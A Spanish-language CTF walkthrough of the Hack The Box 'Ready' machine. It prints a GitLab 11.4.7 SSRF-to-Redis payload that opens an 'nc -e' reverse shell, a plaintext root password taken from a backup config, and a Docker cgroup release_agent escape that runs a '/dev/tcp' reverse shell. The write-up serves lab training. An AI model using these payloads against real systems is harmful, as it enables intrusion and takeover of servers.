# Ready

**OS**: Linux \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen
- GitLab - Remote Code Execution
- Linpeas
- Escaping Docker container
- Montar particiones

## Nmap Scan

`nmap -sV -sC -p- 10.10.10.220`

```
Nmap scan report for 10.10.10.220
Host is up (0.065s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

Accediendo a la página https://10.10.10.220:5080/ podemos ver la aplicación GitLab que nos muestra un panel de inicio de sesión y de registro. Nos creamos una cuenta y se iniciará sesión automáticamente.

![1](img/1.png)

Estando dentro de la aplicación en el apartado de [help](http://10.10.10.220:5080/help) podemos ver la versión de la aplicación **GitLab Community Edition 11.4.7**.

![2](img/2.png)

### GitLab 11.4.7 - Remote Code Execution

Investigando la versión de GitLab encontramos que es vulnerable a ejecución remota de código, nos apoyamos del siguiente [blog](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) para obtener nuestra reverse shell.

En el apartado de crear nuevo proyecto seleccionamos la opción de **Repo by URL**, llenamos los campos **Git Repository URL** y **Project name**, todo lo demás por defecto.

![3](img/3.png)

Daremos clic en **Create project**, capturamos la request con BurpSuite y la mandamos al Repearter.

![4](img/4.png)

Vamos a estar modificando el parámetro **project[import_url]** para obtener ejecución de comandos con las siguientes líneas.

```
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test
 multi

 sadd resque:gitlab:queues system_hook_push

 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| nc -e /bin/bash 10.10.14.8 1234').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"

 exec
 exec
```

Ponemos a la escucha nuestro netcat y mandamos la request para obtener nuestra reverse shell.

![5](img/5.png)

- `nc -lvnp 1234`
- `python3 -c "import pty;pty.spawn('/bin/bash')"`

![6](img/6.png)

## Escalada de Privilegios (User)

Utilizando **linpeas.sh** enumeramos y en el archivo **/opt/backup/gitlab.rb** podemos ver un password.

`cat /opt/backup/gitlab.rb`

![7](img/7.png)

```
root:wW59U!ZKMbG9+*#h
```

El password anterior se puede usar con el usuario root.

- `su`
- `cat /home/dude/user.txt`

![8](img/8.png)

## Escalada de Privilegios (Root)

Investigando como escapar del contenedor Docker encontramos este [artículo](https://book.hacktricks.xyz/linux-unix/privilege-escalation/escaping-from-a-docker-container) para obtener una reverse shell.

Utilizamos los siguientes comando para escapar.

```
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
```

![9](img/9.png)

```
echo '#!/bin/bash' > /cmd
echo 'bash -i >& /dev/tcp/10.10.14.8/9000 0>&1' >> /cmd
chmod a+x /cmd
```

![10](img/10.png)

- `nc -lvnp 9000`
- `sh -c 'echo \$\$ > /tmp/cgrp/x/cgroup.procs'`

![11](img/11.png)

## Root Alternativa

Es posible montar temporalmente **/dev/sda2**.

- `df -h`
- `mkdir /tmp/doom`
- `mount /dev/sda2 /tmp/doom`
- `cat /tmp/doom/root/root.txt`

![12](img/12.png)

## Referencias
https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ \
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS \
https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1 \
https://book.hacktricks.xyz/linux-unix/privilege-escalation/escaping-from-a-docker-container \
https://www.exploit-db.com/exploits/47147
